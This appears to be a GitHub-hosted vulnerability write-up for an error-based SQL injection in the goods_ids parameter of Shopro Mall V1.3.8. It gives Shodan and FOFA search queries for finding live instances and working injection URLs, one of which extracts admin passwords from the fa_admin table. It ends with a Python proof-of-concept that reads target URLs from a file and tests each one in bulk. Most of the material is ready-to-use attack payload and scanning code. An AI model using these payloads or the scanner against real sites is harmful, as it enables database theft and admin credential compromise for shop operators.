Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Shopro Mall system V1.3.8 Value parameter has SQL injection

Shopro Mall system

Official Website:https://shopro.top Github:https://github.com/ITmonkey-cn/shopro.git

Search

shodan:http.title:"shopro" fofa:title="shopro"

Vulnerability Type

Error-Based SQL Injection

Vulnerability Version

V1.3.8

Recurring environment:

  • ubuntu
  • python3.7

Vulnerability Description AND recurrence

  1. F12 find something interesting

  2. parameter goods_ids has sql error message

    http://url/addons/shopro/goods/lists?page=1&goods_ids=32),updatexml(1,concat(0x7e,(select database()),0x7e),1)-- -
    
  3. Find information whit Error-Based SQL Injection

    http://url/addons/shopro/goods/lists?page=1&goods_ids=32),updatexml(1,concat(0x7e,(select group_concat(password) from fa_admin),0x7e),1)-- -
    

  4. POC

    import requests
    requests.packages.urllib3.disable_warnings()
    def poc(url):
    	try:
    		payload = "/addons/shopro/goods/lists?page=1&goods_ids=32),updatexml(1,concat(0x7e,(select database()),0x7e),1)-- -"
    		target = url + payload
    		#print(url)
    		header = {'User-Agent':'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6'}
    		response = requests.get(target, headers=header, timeout=5,verify=False)
    		#print(response.status_code)
    		#print(response.text)
    		if response.status_code == 500 and "XPATH" in response.text:
    			print(url + " is vulnerable")
    	except Exception as e:
    		pass
    	else:
    		pass
    
    
    def main():
    	with open('url.txt',encoding='utf-8') as f:
    		for i in f.readlines():
    			poc( i.strip())
    		f.close()
    
    
    if __name__ == '__main__':	
    	main()